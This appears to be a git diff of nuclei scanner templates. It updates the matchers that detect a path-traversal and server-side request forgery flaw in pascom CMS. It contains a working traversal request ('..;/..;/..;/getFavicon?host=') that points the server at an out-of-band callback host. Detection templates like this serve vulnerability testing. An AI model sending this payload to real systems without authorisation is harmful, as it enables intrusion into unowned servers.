additional matcher update
parent
7c799e935c
commit
a97dccb54a
|
@ -16,8 +16,13 @@ requests:
|
|||
path:
|
||||
- "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" # Triple parent because endpoint access via backend (parent of index CMS)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -30,6 +30,5 @@ requests:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- "status_code_2 != status_code_1"
|
||||
# - "status_code_2 == 200" # This would contradict the matcher below if enabled, because it reduces false-positives - while the status of traversal isn't always OK (200)
|
||||
- "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS
|
||||
condition: and
|
||||
condition: and
|
Loading…
Reference in New Issue